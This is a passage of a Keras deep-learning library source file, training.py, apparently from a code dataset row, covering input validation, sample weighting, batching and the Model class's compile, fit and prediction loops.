source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
training.py
|
from __future__ import print_function
from __future__ import absolute_import
import warnings
import copy
import time
import numpy as np
import multiprocessing
import threading
import six
try:
import queue
except ImportError:
import Queue as queue
from .topology import Container
from .. import backend as K
from .. import optimizers
from .. import objectives
from .. import metrics as metrics_module
from ..utils.generic_utils import Progbar
from .. import callbacks as cbks
def standardize_input_data(data, names, shapes=None,
check_batch_dim=True,
exception_prefix=''):
'''Users may pass data as a list of arrays, dictionary of arrays,
or as a single array. We normalize this to an ordered list of
arrays (same order as `names`), while checking that the provided
arrays have shapes that match the network's expectations.
'''
if type(data) is dict:
arrays = []
for name in names:
if name not in data:
raise Exception('No data provided for "' +
name + '". Need data for each key in: ' +
str(data.keys()))
arrays.append(data[name])
elif type(data) is list:
if len(data) != len(names):
if len(data) > 0 and hasattr(data[0], 'shape'):
raise Exception('Error when checking ' + exception_prefix +
': the list of Numpy arrays '
'that you are passing to your model '
'is not the size the model expected. '
'Expected to see ' + str(len(names)) +
' arrays but instead got '
'the following list of ' + str(len(data)) +
' arrays: ' + str(data)[:200] +
'...')
else:
if len(names) == 1:
data = [np.asarray(data)]
else:
raise Exception('Error when checking ' + exception_prefix +
': you are passing a list as '
'input to your model, '
'but the model expects '
'a list of ' + str(len(names)) +
' Numpy arrays instead. '
'The list you passed was: ' +
str(data)[:200])
arrays = data
else:
if not hasattr(data, 'shape'):
raise Exception('Error when checking ' + exception_prefix +
': data should be a Numpy array, '
'or list/dict of Numpy arrays. '
'Found: ' + str(data)[:200] + '...')
if len(names) != 1:
# case: model expects multiple inputs but only received
# a single Numpy array
raise Exception('The model expects ' + str(len(names)) +
' input arrays, but only received one array. '
'Found: array with shape ' + str(data.shape))
arrays = [data]
# make arrays at least 2D
for i in range(len(names)):
array = arrays[i]
if len(array.shape) == 1:
array = np.expand_dims(array, 1)
arrays[i] = array
# check shapes compatibility
if shapes:
for i in range(len(names)):
if shapes[i] is None:
continue
array = arrays[i]
if len(array.shape) != len(shapes[i]):
raise Exception('Error when checking ' + exception_prefix +
': expected ' + names[i] +
' to have ' + str(len(shapes[i])) +
' dimensions, but got array with shape ' +
str(array.shape))
for j, (dim, ref_dim) in enumerate(zip(array.shape, shapes[i])):
if not j and not check_batch_dim:
# skip the first axis
continue
if ref_dim:
if ref_dim != dim:
raise Exception('Error when checking ' + exception_prefix +
': expected ' + names[i] +
' to have shape ' + str(shapes[i]) +
' but got array with shape ' +
str(array.shape))
return arrays
def standardize_sample_or_class_weights(x_weight, output_names, weight_type):
if x_weight is None or len(x_weight) == 0:
return [None for _ in output_names]
if len(output_names) == 1:
if type(x_weight) is list and len(x_weight) == 1:
return x_weight
if type(x_weight) is dict and output_names[0] in x_weight:
return [x_weight[output_names[0]]]
else:
return [x_weight]
if type(x_weight) is list:
if len(x_weight) != len(output_names):
raise Exception('Provided `' + weight_type + '` was a list of ' +
str(len(x_weight)) +
' elements, but the model has ' +
str(len(output_names)) + ' outputs. '
'You should provide one `' + weight_type + '`'
'array per model output.')
return x_weight
if type(x_weight) is dict:
x_weights = []
for name in output_names:
x_weights.append(x_weight.get(name))
return x_weights
else:
raise Exception('The model has multiple outputs, so `' +
weight_type + '` '
'should be either a list of a dict. '
'Provided `' + weight_type +
'` type not understood: ' +
str(x_weight))
def standardize_class_weights(class_weight, output_names):
return standardize_sample_or_class_weights(class_weight,
output_names,
'class_weight')
def standardize_sample_weights(sample_weight, output_names):
return standardize_sample_or_class_weights(sample_weight,
output_names,
'sample_weight')
def check_array_lengths(X, Y, W):
x_lengths = [x.shape[0] for x in X]
y_lengths = [y.shape[0] for y in Y]
w_lengths = [w.shape[0] for w in W]
set_x = set(x_lengths)
if len(set_x) != 1:
raise Exception('All input arrays (x) should have '
'the same number of samples.')
set_y = set(y_lengths)
if len(set_y) != 1:
raise Exception('All target arrays (y) should have '
'the same number of samples.')
set_w = set(w_lengths)
if len(set_w) != 1:
raise Exception('All sample_weight arrays should have '
'the same number of samples.')
if list(set_x)[0] != list(set_y)[0]:
raise Exception('Input arrays should have '
'the same number of samples as target arrays. Found ' +
str(list(set_x)[0]) + ' input samples and ' +
str(list(set_y)[0]) + ' target samples.')
if list(set_x)[0] != list(set_w)[0]:
raise Exception('Sample_weight arrays should have '
'the same number of samples as input arrays. Found ' +
str(list(set_x)[0]) + ' input samples and ' +
str(list(set_w)[0]) + ' target samples.')
def check_loss_and_target_compatibility(targets, losses, output_shapes):
key_losses = {'mean_square_error',
'binary_crossentropy',
'categorical_crossentropy'}
for y, loss, shape in zip(targets, losses, output_shapes):
if loss.__name__ == 'categorical_crossentropy':
if y.shape[-1] == 1:
raise Exception('You are passing a target array of shape ' + str(y.shape) +
' while using as loss `categorical_crossentropy`. '
'`categorical_crossentropy` expects '
'targets to be binary matrices (1s and 0s) '
'of shape (samples, classes). '
'If your targets are integer classes, '
'you can convert them to the expected format via:\n'
'```\n'
'from keras.utils.np_utils import to_categorical\n'
'y_binary = to_categorical(y_int)\n'
'```\n'
'\n'
'Alternatively, you can use the loss function '
'`sparse_categorical_crossentropy` instead, '
'which does expect integer targets.')
if loss.__name__ in key_losses:
for target_dim, out_dim in zip(y.shape[1:], shape[1:]):
if out_dim is not None and target_dim != out_dim:
raise Exception('A target array with shape ' + str(y.shape) +
' was passed for an output of shape ' + str(shape) +
' while using as loss `' + loss.__name__ + '`. '
'This loss expects '
'targets to have the same shape '
'as the output.')
def collect_metrics(metrics, output_names):
if not metrics:
return [[] for _ in output_names]
if type(metrics) is list:
# we then apply all metrics to all outputs.
return [copy.copy(metrics) for _ in output_names]
elif type(metrics) is dict:
nested_metrics = []
for name in output_names:
output_metrics = metrics.get(name, [])
if type(output_metrics) is not list:
output_metrics = [output_metrics]
nested_metrics.append(output_metrics)
return nested_metrics
else:
raise Exception('Type of `metrics` argument not understood. '
'Expected a list or dictionary, found: ' +
str(metrics))
def batch_shuffle(index_array, batch_size):
'''This shuffles an array in a batch-wise fashion.
Useful for shuffling HDF5 arrays
(where one cannot access arbitrary indices).
'''
batch_count = int(len(index_array) / batch_size)
# to reshape we need to be cleanly divisible by batch size
# we stash extra items and reappend them after shuffling
last_batch = index_array[batch_count * batch_size:]
index_array = index_array[:batch_count * batch_size]
index_array = index_array.reshape((batch_count, batch_size))
np.random.shuffle(index_array)
index_array = index_array.flatten()
return np.append(index_array, last_batch)
def make_batches(size, batch_size):
'''Returns a list of batch indices (tuples of indices).
'''
nb_batch = int(np.ceil(size / float(batch_size)))
return [(i * batch_size, min(size, (i + 1) * batch_size))
for i in range(0, nb_batch)]
def slice_X(X, start=None, stop=None):
'''This takes an array-like, or a list of
array-likes, and outputs:
- X[start:stop] if X is an array-like
- [x[start:stop] for x in X] if X in a list
Can also work on list/array of indices: `slice_X(x, indices)`
# Arguments:
start: can be an integer index (start index)
or a list/array of indices
stop: integer (stop index); should be None if
`start` was a list.
'''
if type(X) == list:
if hasattr(start, '__len__'):
# hdf5 datasets only support list objects as indices
if hasattr(start, 'shape'):
start = start.tolist()
return [x[start] for x in X]
else:
return [x[start:stop] for x in X]
else:
if hasattr(start, '__len__'):
if hasattr(start, 'shape'):
start = start.tolist()
return X[start]
else:
return X[start:stop]
def weighted_objective(fn):
'''Transforms an objective function `fn(y_true, y_pred)`
into a sample-weighted, cost-masked objective function
`fn(y_true, y_pred, weights, mask)`.
'''
def weighted(y_true, y_pred, weights, mask=None):
# score_array has ndim >= 2
score_array = fn(y_true, y_pred)
if mask is not None:
# Cast the mask to floatX to avoid float64 upcasting in theano
mask = K.cast(mask, K.floatx())
# mask should have the same shape as score_array
score_array *= mask
# the loss per batch should be proportional
# to the number of unmasked samples.
score_array /= K.mean(mask)
# reduce score_array to same ndim as weight array
ndim = K.ndim(score_array)
weight_ndim = K.ndim(weights)
score_array = K.mean(score_array, axis=list(range(weight_ndim, ndim)))
# apply sample weighting
if weights is not None:
score_array *= weights
score_array /= K.mean(K.cast(K.not_equal(weights, 0), K.floatx()))
return K.mean(score_array)
return weighted
def standardize_weights(y, sample_weight=None, class_weight=None,
sample_weight_mode=None):
'''Performs weight input validation and standardization
to a single sample-wise (or timestep-wise) weight array.
'''
if sample_weight_mode is not None:
if sample_weight_mode != 'temporal':
raise Exception('"sample_weight_mode '
'should be None or "temporal". '
'Found: ' + str(sample_weight_mode))
if len(y.shape) < 3:
raise Exception('Found a sample_weight array for '
'an input with shape ' +
str(y.shape) + '. '
'Timestep-wise sample weighting (use of '
'sample_weight_mode="temporal") is restricted to '
'outputs that are at least 3D, i.e. that have '
'a time dimension.')
if sample_weight is not None and len(sample_weight.shape) != 2:
raise Exception('Found a sample_weight array with shape ' +
str(sample_weight.shape) + '. '
'In order to use timestep-wise sample weighting, '
'you should pass a 2D sample_weight array.')
else:
if sample_weight is not None and len(sample_weight.shape) != 1:
raise Exception('Found a sample_weight array with shape ' +
str(sample_weight.shape) + '. '
'In order to use timestep-wise sample weights, '
'you should specify sample_weight_mode="temporal" '
'in compile(). If you just mean to use '
'sample-wise weights, make sure your '
'sample_weight array is 1D.')
if sample_weight is not None:
assert len(sample_weight.shape) <= len(y.shape)
# TODO: proper error message
assert y.shape[:sample_weight.ndim] == sample_weight.shape
return sample_weight
elif isinstance(class_weight, dict):
if len(y.shape) > 2:
raise Exception('class_weight not supported for '
'3+ dimensional targets.')
if y.shape[1] > 1:
y_classes = y.argmax(axis=1)
elif y.shape[1] == 1:
y_classes = np.reshape(y, y.shape[0])
else:
y_classes = y
weights = np.asarray([class_weight[cls] for cls in y_classes])
return weights
else:
if sample_weight_mode is None:
return np.ones((y.shape[0],), dtype=K.floatx())
else:
return np.ones((y.shape[0], y.shape[1]), dtype=K.floatx())
def generator_queue(generator, max_q_size=10,
wait_time=0.05, nb_worker=1, pickle_safe=False):
'''Builds a queue out of a data generator.
If pickle_safe, use a multiprocessing approach. Else, use threading.
Used in `fit_generator`, `evaluate_generator`, `predict_generator`.
'''
generator_threads = []
if pickle_safe:
q = multiprocessing.Queue(maxsize=max_q_size)
_stop = multiprocessing.Event()
else:
q = queue.Queue()
_stop = threading.Event()
try:
def data_generator_task():
while not _stop.is_set():
try:
if pickle_safe or q.qsize() < max_q_size:
generator_output = next(generator)
q.put(generator_output)
else:
time.sleep(wait_time)
except Exception:
_stop.set()
raise
for i in range(nb_worker):
if pickle_safe:
# Reset random seed else all children processes share the same seed
np.random.seed()
thread = multiprocessing.Process(target=data_generator_task)
else:
thread = threading.Thread(target=data_generator_task)
generator_threads.append(thread)
thread.daemon = True
thread.start()
except:
_stop.set()
if pickle_safe:
# Terminate all daemon processes
for p in generator_threads:
if p.is_alive():
p.terminate()
q.close()
raise
return q, _stop, generator_threads
class Model(Container):
def compile(self, optimizer, loss, metrics=[], loss_weights=None,
sample_weight_mode=None, **kwargs):
'''Configures the model for training.
# Arguments
optimizer: str (name of optimizer) or optimizer object.
See [optimizers](/optimizers).
loss: str (name of objective function) or objective function.
See [objectives](/objectives).
If the model has multiple outputs, you can use a different loss
on each output by passing a dictionary or a list of objectives.
metrics: list of metrics to be evaluated by the model
during training and testing.
Typically you will use `metrics=['accuracy']`.
To specify different metrics for different outputs of a
multi-output model, you could also pass a dictionary,
such as `metrics={'output_a': 'accuracy'}`.
sample_weight_mode: if you need to do timestep-wise
sample weighting (2D weights), set this to "temporal".
"None" defaults to sample-wise weights (1D).
If the model has multiple outputs, you can use a different
`sample_weight_mode` on each output by passing a
dictionary or a list of modes.
kwargs: when using the Theano backend, these arguments
are passed into K.function. Ignored for Tensorflow backend.
'''
self.optimizer = optimizers.get(optimizer)
self.sample_weight_mode = sample_weight_mode
self.loss = loss
self.loss_weights = loss_weights
# prepare loss weights
if loss_weights is None:
loss_weights_list = [1. for _ in range(len(self.outputs))]
elif type(loss_weights) is dict:
for name in loss_weights:
if name not in self.output_names:
raise Exception('Unknown entry in loss_weights '
'dictionary: "' + name + '". '
'Only expected the following keys: ' +
str(self.output_names))
loss_weights_list = []
for name in self.output_names:
loss_weights_list.append(loss_weights.get(name, 1.))
elif type(loss_weights) is list:
if len(loss_weights) != len(self.outputs):
raise Exception('When passing a list as loss_weights, '
'it should have one entry per model outputs. '
'The model has ' + str(len(self.outputs)) +
' outputs, but you passed loss_weights=' +
str(loss_weights))
loss_weights_list = loss_weights
else:
raise Exception('Could not interpret loss_weights argument: ' +
str(loss_weights))
# prepare loss functions
if type(loss) is dict:
for name in loss:
if name not in self.output_names:
raise Exception('Unknown entry in loss '
'dictionary: "' + name + '". '
'Only expected the following keys: ' +
str(self.output_names))
loss_functions = []
for name in self.output_names:
if name not in loss:
raise Exception('Output "' + name +
'" missing from loss dictionary')
loss_functions.append(objectives.get(loss[name]))
elif type(loss) is list:
if len(loss) != len(self.outputs):
raise Exception('When passing a list as loss, '
'it should have one entry per model outputs. '
'The model has ' + str(len(self.outputs)) +
' outputs, but you passed loss=' +
str(loss))
loss_functions = [objectives.get(l) for l in loss]
else:
loss_function = objectives.get(loss)
loss_functions = [loss_function for _ in range(len(self.outputs))]
self.loss_functions = loss_functions
weighted_losses = [weighted_objective(fn) for fn in loss_functions]
# prepare output masks
masks = self.compute_mask(self.inputs, mask=None)
if masks is None:
masks = [None for _ in self.outputs]
if type(masks) is not list:
masks = [masks]
# prepare sample weights
if type(sample_weight_mode) is dict:
for name in sample_weight_mode:
if name not in self.output_names:
raise Exception('Unknown entry in '
'sample_weight_mode dictionary: "' +
name + '". '
'Only expected the following keys: ' +
str(self.output_names))
sample_weights = []
sample_weight_modes = []
for name in self.output_names:
if name not in sample_weight_mode:
raise Exception('Output "' + name +
'" missing from sample_weight_modes '
'dictionary')
if sample_weight_mode.get(name) == 'temporal':
weight = K.placeholder(ndim=2, name=name + '_sample_weights')
sample_weight_modes.append('temporal')
else:
weight = K.placeholder(ndim=1, name=name + '_sample_weights')
sample_weight_modes.append(None)
sample_weights.append(weight)
elif type(sample_weight_mode) is list:
if len(sample_weight_mode) != len(self.outputs):
raise Exception('When passing a list as sample_weight_mode, ' +
'it should have one entry per model outputs. '
'The model has ' + str(len(self.outputs)) +
' outputs, but you passed sample_weight_mode=' +
str(sample_weight_mode))
sample_weights = []
sample_weight_modes = []
for mode, name in zip(sample_weight_mode, self.output_names):
if mode == 'temporal':
weight = K.placeholder(ndim=2, name=name + '_sample_weights')
sample_weight_modes.append('temporal')
else:
weight = K.placeholder(ndim=1, name=name + '_sample_weights')
sample_weight_modes.append(None)
sample_weights.append(weight)
else:
if sample_weight_mode == 'temporal':
sample_weights = [K.placeholder(ndim=2, name=name + '_sample_weights')
for name in self.output_names]
sample_weight_modes = ['temporal' for name in self.output_names]
else:
sample_weights = [K.placeholder(ndim=1, name=name + '_sample_weights')
for name in self.output_names]
sample_weight_modes = [None for name in self.output_names]
self.sample_weight_modes = sample_weight_modes
# prepare targets of model
self.targets = []
for i in range(len(self.outputs)):
shape = self.internal_output_shapes[i]
name = self.output_names[i]
self.targets.append(K.placeholder(ndim=len(shape),
name=name + '_target',
sparse=K.is_sparse(self.outputs[i]),
dtype=K.dtype(self.outputs[i])))
# prepare metrics
self.metrics = metrics
self.metrics_names = ['loss']
self.metrics_tensors = []
# compute total loss
total_loss = None
for i in range(len(self.outputs)):
y_true = self.targets[i]
y_pred = self.outputs[i]
weighted_loss = weighted_losses[i]
sample_weight = sample_weights[i]
mask = masks[i]
loss_weight = loss_weights_list[i]
output_loss = weighted_loss(y_true, y_pred,
sample_weight, mask)
if len(self.outputs) > 1:
self.metrics_tensors.append(output_loss)
self.metrics_names.append(self.output_names[i] + '_loss')
if total_loss is None:
total_loss = loss_weight * output_loss
else:
total_loss += loss_weight * output_loss
# add regularization penalties to the loss
for r in self.regularizers:
total_loss = r(total_loss)
# list of same size as output_names.
# contains tuples (metrics for output, names of metrics)
nested_metrics = collect_metrics(metrics, self.output_names)
def append_metric(layer_num, metric_name, metric_tensor):
"""Helper function, used in loop below"""
if len(self.output_names) > 1:
metric_name = self.output_layers[layer_num].name + '_' + metric_name
self.metrics_names.append(metric_name)
self.metrics_tensors.append(metric_tensor)
for i in range(len(self.outputs)):
y_true = self.targets[i]
y_pred = self.outputs[i]
output_metrics = nested_metrics[i]
for metric in output_metrics:
if metric == 'accuracy' or metric == 'acc':
# custom handling of accuracy (because of class mode duality)
output_shape = self.internal_output_shapes[i]
acc_fn = None
if output_shape[-1] == 1 or self.loss_functions[i] == objectives.binary_crossentropy:
# case: binary accuracy
acc_fn = metrics_module.binary_accuracy
elif self.loss_functions[i] == objectives.sparse_categorical_crossentropy:
# case: categorical accuracy with sparse targets
acc_fn = metrics_module.sparse_categorical_accuracy
else:
acc_fn = metrics_module.categorical_accuracy
append_metric(i, 'acc', acc_fn(y_true, y_pred))
else:
metric_fn = metrics_module.get(metric)
metric_result = metric_fn(y_true, y_pred)
if not isinstance(metric_result, dict):
metric_result = {
metric_fn.__name__: metric_result
}
for name, tensor in six.iteritems(metric_result):
append_metric(i, name, tensor)
# prepare gradient updates and state updates
self.optimizer = optimizers.get(optimizer)
self.total_loss = total_loss
self.sample_weights = sample_weights
# functions for train, test and predict will
# be compiled lazily when required.
# This saves time when the user is not using all functions.
self._function_kwargs = kwargs
self.train_function = None
self.test_function = None
self.predict_function = None
# collected trainable weights and sort them deterministically.
trainable_weights = self.trainable_weights
# Sort weights by name
if trainable_weights:
if K.backend() == 'theano':
trainable_weights.sort(key=lambda x: x.name if x.name else x.auto_name)
else:
trainable_weights.sort(key=lambda x: x.name)
self._collected_trainable_weights = trainable_weights
def _make_train_function(self):
if not hasattr(self, 'train_function'):
raise Exception('You must compile your model before using it.')
if self.train_function is None:
if self.uses_learning_phase and type(K.learning_phase()) is not int:
inputs = self.inputs + self.targets + self.sample_weights + [K.learning_phase()]
else:
inputs = self.inputs + self.targets + self.sample_weights
training_updates = self.optimizer.get_updates(self._collected_trainable_weights,
self.constraints,
self.total_loss)
updates = self.updates + training_updates
# returns loss and metrics. Updates weights at each call.
self.train_function = K.function(inputs,
[self.total_loss] + self.metrics_tensors,
updates=updates,
**self._function_kwargs)
def _make_test_function(self):
if not hasattr(self, 'test_function'):
raise Exception('You must compile your model before using it.')
if self.test_function is None:
if self.uses_learning_phase and type(K.learning_phase()) is not int:
inputs = self.inputs + self.targets + self.sample_weights + [K.learning_phase()]
else:
inputs = self.inputs + self.targets + self.sample_weights
# return loss and metrics, no gradient updates.
# Does update the network states.
self.test_function = K.function(inputs,
[self.total_loss] + self.metrics_tensors,
updates=self.state_updates,
**self._function_kwargs)
def _make_predict_function(self):
if not hasattr(self, 'predict_function'):
self.predict_function = None
if self.predict_function is None:
if self.uses_learning_phase and type(K.learning_phase()) is not int:
inputs = self.inputs + [K.learning_phase()]
else:
inputs = self.inputs
# returns network outputs. Does not update weights.
# Does update the network states.
kwargs = getattr(self, '_function_kwargs', {})
self.predict_function = K.function(inputs,
self.outputs,
updates=self.state_updates,
**kwargs)
def _fit_loop(self, f, ins, out_labels=[], batch_size=32,
nb_epoch=100, verbose=1, callbacks=[],
val_f=None, val_ins=None, shuffle=True,
callback_metrics=[], initial_epoch=0):
'''Abstract fit function for f(ins).
Assume that f returns a list, labeled by out_labels.
# Arguments
f: Keras function returning a list of tensors
ins: list of tensors to be fed to `f`
out_labels: list of strings, display names of
the outputs of `f`
batch_size: integer batch size
nb_epoch: number of times to iterate over the data
verbose: verbosity mode, 0, 1 or 2
callbacks: list of callbacks to be called during training
val_f: Keras function to call for validation
val_ins: list of tensors to be fed to `val_f`
shuffle: whether to shuffle the data at the beginning of each epoch
callback_metrics: list of strings, the display names of the metrics
passed to the callbacks. They should be the
concatenation of list the display names of the outputs of
`f` and the list of display names of the outputs of `f_val`.
initial_epoch: epoch at which to start training
(useful for resuming a previous training run)
# Returns
`History` object.
'''
do_validation = False
if val_f and val_ins:
do_validation = True
if verbose:
print('Train on %d samples, validate on %d samples' %
(ins[0].shape[0], val_ins[0].shape[0]))
nb_train_sample = ins[0].shape[0]
index_array = np.arange(nb_train_sample)
self.history = cbks.History()
callbacks = [cbks.BaseLogger()] + callbacks + [self.history]
if verbose:
callbacks += [cbks.ProgbarLogger()]
callbacks = cbks.CallbackList(callbacks)
# it's possible to callback a different model than self
# (used by Sequential models)
if hasattr(self, 'callback_model') and self.callback_model:
callback_model = self.callback_model
else:
callback_model = self
callbacks._set_model(callback_model)
callbacks._set_params({
'batch_size': batch_size,
'nb_epoch': nb_epoch,
'nb_sample': nb_train_sample,
'verbose': verbose,
'do_validation': do_validation,
'metrics': callback_metrics,
})
callbacks.on_train_begin()
callback_model.stop_training = False
self.validation_data = val_ins
for epoch in range(initial_epoch, nb_epoch):
callbacks.on_epoch_begin(epoch)
if shuffle == 'batch':
index_array = batch_shuffle(index_array, batch_size)
elif shuffle:
np.random.shuffle(index_array)
batches = make_batches(nb_train_sample, batch_size)
epoch_logs = {}
for batch_index, (batch_start, batch_end) in enumerate(batches):
batch_ids = index_array[batch_start:batch_end]
try:
if type(ins[-1]) is float:
# do not slice the training phase flag
ins_batch = slice_X(ins[:-1], batch_ids) + [ins[-1]]
else:
ins_batch = slice_X(ins, batch_ids)
except TypeError:
raise Exception('TypeError while preparing batch. '
'If using HDF5 input data, '
'pass shuffle="batch".')
batch_logs = {}
batch_logs['batch'] = batch_index
batch_logs['size'] = len(batch_ids)
callbacks.on_batch_begin(batch_index, batch_logs)
outs = f(ins_batch)
if type(outs) != list:
outs = [outs]
for l, o in zip(out_labels, outs):
batch_logs[l] = o
callbacks.on_batch_end(batch_index, batch_logs)
if batch_index == len(batches) - 1: # last batch
# validation
if do_validation:
# replace with self._evaluate
val_outs = self._test_loop(val_f, val_ins,
batch_size=batch_size,
verbose=0)
if type(val_outs) != list:
val_outs = [val_outs]
# same labels assumed
for l, o in zip(out_labels, val_outs):
epoch_logs['val_' + l] = o
callbacks.on_epoch_end(epoch, epoch_logs)
if callback_model.stop_training:
break
callbacks.on_train_end()
return self.history
def _predict_loop(self, f, ins, batch_size=32, verbose=0):
'''Abstract method to loop over some data in batches.
# Arguments
f: Keras function returning a list of tensors.
ins: list of tensors to be fed to `f`.
batch_size: integer batch size.
verbose: verbosity mode.
# Returns
Array of predictions (if the model has a single output)
or list of arrays of predictions
(if the model has multiple outputs).
'''
nb_sample = ins[0].shape[0]
outs = []
if verbose == 1:
progbar = Progbar(target=nb_sample)
batches = make_batches(nb_sample, batch_size)
index_array = np.arange(nb_sample)
for batch_index, (batch_start, batch_end) in enumerate(batches):
batch_ids = index_array[batch_start:batch_end]
if type(ins[-1]) is float:
# do not slice the training phase flag
ins_batch = slice_X(ins[:-1], batch_ids) + [ins[-1]]
else:
ins_batch = slice_X(ins, batch_ids)
batch_outs = f(ins_batch)
if type(batch_outs) != list:
batch_outs = [batch_outs]
if batch_index == 0:
for batch_out in batch_outs:
shape = (nb_sample,) + batch_out.shape[1:]
outs.append(np.zeros(shape, dtype=K.floatx()))
for i, batch_out in enumerate(batch_outs):
outs[i][batch_start:batch_end] = batch_out
if verbose == 1:
progbar.update(batch_end)
if len(outs) == 1:
return outs[0]
return outs
def _test_loop(self, f, ins, batch_size=32, verbose=0):
'''Abstract method to loop over some data in batches.
# Arguments
f: Keras function returning a list of tensors.
ins: list of tensors to be fed to `f`.
batch_size: integer batch size.
verbose: verbosity mode.
# Returns
Scalar loss (if the model has a single output and no metrics)
or list of scalars (if the model has multiple outputs
and/or metrics). The attribute `model.metrics_names` will give you
the display labels for the scalar outputs.
'''
nb_sample = ins[0].shape[0]
outs = []
if verbose == 1:
progbar = Progbar(target=nb_sample)
batches = make_batches(nb_sample, batch_size)
index_array = np.arange(nb_sample)
for batch_index, (batch_start, batch_end) in enumerate(batches):
batch_ids = index_array[batch_start:batch_end]
if type(ins[-1]) is float:
# do not slice the training phase flag
ins_batch = slice_X(ins[:-1], batch_ids) + [ins[-1]]
else:
ins_batch = slice_X(ins, batch_ids)
batch_outs = f(ins_batch)
if type(batch_outs) == list:
if batch_index == 0:
for batch_out in enumerate(batch_outs):
outs.append(0.)
for i, batch_out in enumerate(batch_outs):
outs[i] += batch_out * len(batch_ids)
else:
if batch_index == 0:
outs.append(0.)
outs[0] += batch_outs * len(batch_ids)
if verbose == 1:
progbar.update(batch_end)
for i, out in enumerate(outs):
outs[i] /= nb_sample
if len(outs) == 1:
return outs[0]
return outs
def _standardize_user_data(self, x, y,
sample_weight=None, class_weight=None,
check_batch_dim=True, batch_size=None):
if not hasattr(self, 'optimizer'):
raise Exception('You must compile a model before training/testing.'
' Use `model.compile(optimizer, loss)`.')
output_shapes = []
for output_shape, loss_fn in zip(self.internal_output_shapes, self.loss_functions):
if loss_fn.__name__ == 'sparse_categorical_crossentropy':
output_shapes.append(output_shape[:-1] + (1,))
elif getattr(objectives, loss_fn.__name__, None) is None:
output_shapes.append(None)
else:
output_shapes.append(output_shape)
x = standardize_input_data(x, self.input_names,
self.internal_input_shapes,
check_batch_dim=False,
exception_prefix='model input')
y = standardize_input_data(y, self.output_names,
output_shapes,
check_batch_dim=False,
exception_prefix='model target')
sample_weights = standardize_sample_weights(sample_weight,
self.output_names)
class_weights = standardize_class_weights(class_weight,
self.output_names)
sample_weights = [standardize_weights(ref, sw, cw, mode)
for (ref, sw, cw, mode)
in zip(y, sample_weights, class_weights, self.sample_weight_modes)]
check_array_lengths(x, y, sample_weights)
check_loss_and_target_compatibility(y, self.loss_functions, self.internal_output_shapes)
if self.stateful and batch_size:
if x[0].shape[0] % batch_size != 0:
raise Exception('In a stateful network, '
'you should only pass inputs with '
'a number of samples that can be '
'divided by the batch size. Found: ' +
str(x[0].shape[0]) + ' samples')
return x, y, sample_weights
def fit(self, x, y, batch_size=32, nb_epoch=10, verbose=1, callbacks=[],
validation_split=0., validation_data=None, shuffle=True,
class_weight=None, sample_weight=None, initial_epoch=0):
'''Trains the model for a fixed number of epochs (iterations on a dataset).
# Arguments
x: Numpy array of training data,
or list of Numpy arrays if the model has multiple inputs.
If all inputs in the model are named, you can also pass a dictionary
mapping input names to Numpy arrays.
y: Numpy array of target data,
or list of Numpy arrays if the model has multiple outputs.
If all outputs in the model are named, you can also pass a dictionary
mapping output names to Numpy arrays.
batch_size: integer. Number of samples per gradient update.
nb_epoch: integer, the number of times to iterate over the training data arrays.
verbose: 0, 1, or 2. Verbosity mode. 0 = silent, 1 = verbose, 2 = one log line per epoch.
callbacks: list of callbacks to be called during training.
See [callbacks](/callbacks).
validation_split: float between 0 and 1:
fraction of the training data to be used as validation data.
The model will set apart this fraction of the training data,
will not train on it, and will evaluate the loss and any model metrics
on this data at the end of each epoch.
validation_data: data on which to evaluate the loss and any model metrics
at the end of each epoch. The model will not be trained on this data.
This could be a tuple (x_val, y_val) or a tuple (x_val, y_val, val_sample_weights).
shuffle: boolean, whether to shuffle the training data before each epoch.
class_weight: optional dictionary mapping class indices (integers) to
a weight (float) to apply to the model's loss for the samples
from this class during training.
This can be useful to tell the model to "pay more attention" to
samples from an under-represented class.
sample_weight: optional array of the same length as x, containing
weights to apply to the model's loss for each sample.
In the case of temporal data, you can pass a 2D array
with shape (samples, sequence_length),
to apply a different weight to every timestep of every sample.
In this case you should make sure to specify sample_weight_mode="temporal" in compile().
initial_epoch: epoch at which to start training
(useful for resuming a previous training run)
# Returns
A `History` instance. Its `history` attribute contains
all information collected during training.
'''
# validate user data
x, y, sample_weights = self._standardize_user_data(x, y,
sample_weight=sample_weight,
class_weight=class_weight,
check_batch_dim=False,
batch_size=batch_size)
# prepare validation data
if validation_data:
do_validation = True
if len(validation_data) == 2:
val_x, val_y = validation_data
val_sample_weight = None
elif len(validation_data) == 3:
val_x, val_y, val_sample_weight = validation_data
else:
raise
val_x, val_y, val_sample_weights = self._standardize_user_data(val_x, val_y,
sample_weight=val_sample_weight,
check_batch_dim=False,
batch_size=batch_size)
self._make_test_function()
val_f = self.test_function
if self.uses_learning_phase and type(K.learning_phase()) is not int:
val_ins = val_x + val_y + val_sample_weights + [0.]
else:
val_ins = val_x + val_y + val_sample_weights
elif validation_split and 0. < validation_split < 1.:
do_validation = True
split_at = int(len(x[0]) * (1. - validation_split))
x, val_x = (slice_X(x, 0, split_at), slice_X(x, split_at))
y, val_y = (slice_X(y, 0, split_at), slice_X(y, split_at))
sample_weights, val_sample_weights = (
slice_X(sample_weights, 0, split_at), slice_X(sample_weights, split_at))
self._make_test_function()
val_f = self.test_function
if self.uses_learning_phase and type(K.learning_phase()) is not int:
val_ins = val_x + val_y + val_sample_weights + [0.]
else:
val_ins = val_x + val_y + val_sample_weights
else:
do_validation = False
val_f = None
val_ins = None
# prepare input arrays and training function
if self.uses_learning_phase and type(K.learning_phase()) is not int:
ins = x + y + sample_weights + [1.]
else:
ins = x + y + sample_weights
self._make_train_function()
f = self.train_function
# prepare display labels
out_labels = self.metrics_names
# rename duplicated metrics name
# (can happen with an output layer shared among multiple dataflows)
deduped_out_labels = []
for i, label in enumerate(out_labels):
new_label = label
if out_labels.count(label) > 1:
dup_idx = out_labels[:i].count(label)
new_label += '_' + str(dup_idx + 1)
deduped_out_labels.append(new_label)
out_labels = deduped_out_labels
if do_validation:
callback_metrics = copy.copy(out_labels) + ['val_' + n for n in out_labels]
else:
callback_metrics = copy.copy(out_labels)
# delegate logic to _fit_loop
return self._fit_loop(f, ins, out_labels=out_labels,
batch_size=batch_size, nb_epoch=nb_epoch,
verbose=verbose, callbacks=callbacks,
val_f=val_f, val_ins=val_ins, shuffle=shuffle,
callback_metrics=callback_metrics,
initial_epoch=initial_epoch)
def evaluate(self, x, y, batch_size=32, verbose=1, sample_weight=None):
'''Returns the loss value and metrics values for the model
in test mode. Computation is done in batches.
# Arguments
x: Numpy array of test data,
or list of Numpy arrays if the model has multiple inputs.
